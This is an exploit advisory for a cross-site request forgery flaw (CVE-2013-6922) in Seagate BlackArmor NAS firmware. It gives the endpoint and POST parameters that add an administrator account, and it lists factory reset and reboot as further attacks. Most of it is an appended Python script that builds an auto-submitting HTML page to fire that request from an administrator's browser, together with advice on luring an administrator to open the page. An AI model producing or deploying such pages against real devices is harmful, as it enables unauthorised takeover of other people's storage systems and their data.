# Exploit Title: Seagate BlackArmor NAS - Cross Site Request Forgery
# Google Dork: N/A
# Date: 04-01-2014
# Exploit Author: Jeroen - IT Nerdbox
# Vendor Homepage: http://www.seagate.com/
# Software Link: http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/
# Version: sg2000-2000.1331
# Tested on: N/A
# CVE : CVE-2013-6922
#
#
# Description:
#
# Multiple CSRF attacks are possible because the administrative pages accept
# state-changing POST requests without any anti-CSRF token. The proof of concept
# shows how a user with administrative privileges can be added to the system.
#
# It is also possible to:
#
# 1. Factory reset the device
# 2. Reboot the device
# 3. Add/Edit/Remove users
# 4. Add/Edit/Remove shares and volumes
#
# This vulnerability was reported to Seagate in September 2013; they stated
# that it will not be fixed.
#
#
# Proof of Concept:
#
# POST: http(s)://<url | ip>/admin/access_control_user_add.php?lang=en&gi=a001&fbt=23
# Parameters:
#
# username          attacker
# adminright        yes
# fullname          hacker
# userpasswd        attackers_password
# userpasswdcheck   attackers_password
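# The following is an added example, not part of the original advisory: it
# generates the auto-submitting HTML page that delivers the POST above when an
# authenticated NAS administrator opens it in their browser. The host
# nas.example.local is a placeholder; the endpoint path, the lang/gi/fbt query
# values and the parameter set are taken from the advisory as-is.

```python
# Added example: build a CSRF delivery page for the user-add request.
# Target host and all parameter values are placeholders from the advisory.
import html
import re

# Endpoint from the advisory, including the query string it was observed with.
TARGET_PATH = "/admin/access_control_user_add.php?lang=en&gi=a001&fbt=23"

# Parameter set from the advisory: creates "attacker" with admin rights.
ADD_ADMIN_PARAMS = {
    "username": "attacker",
    "adminright": "yes",
    "fullname": "hacker",
    "userpasswd": "attackers_password",
    "userpasswdcheck": "attackers_password",
}


def build_csrf_page(base_url: str, params: dict, path: str = TARGET_PATH) -> str:
    """Return an HTML page that POSTs `params` to base_url + path as soon as
    it loads. The victim's browser attaches the NAS session cookie itself;
    the request carries no anti-CSRF token because the device requires none.
    Every attacker-controlled string is HTML-escaped so the form stays intact
    even if a value contains quotes or ampersands."""
    action = html.escape(base_url.rstrip("/") + path, quote=True)
    inputs = "\n".join(
        f'    <input type="hidden" name="{html.escape(k, quote=True)}" '
        f'value="{html.escape(v, quote=True)}">'
        for k, v in params.items()
    )
    return f"""<!DOCTYPE html>
<html>
<body onload="document.forms[0].submit()">
  <form method="POST" action="{action}">
{inputs}
    <noscript><input type="submit" value="Continue"></noscript>
  </form>
</body>
</html>
"""


def hidden_fields(page: str) -> dict:
    """Read the hidden inputs back out of a generated page, unescaping the
    values, so the page can be checked to carry exactly the intended POST body."""
    pairs = re.findall(r'name="([^"]*)" value="([^"]*)"', page)
    return {html.unescape(k): html.unescape(v) for k, v in pairs}


if __name__ == "__main__":
    # Writes the PoC page for a hypothetical device at nas.example.local.
    print(build_csrf_page("http://nas.example.local", ADD_ADMIN_PARAMS))
```

# Host the generated page anywhere and get a logged-in administrator to open
# it. One caveat for anyone re-testing this today: the page relies on the
# browser sending the session cookie with a cross-site form POST. Browsers that
# treat cookies without a SameSite attribute as Lax (Chrome since 2020) do not
# attach them to such a POST, so against a current browser the request only
# works if the device sets its cookie with SameSite=None or the test is run
# from an older browser.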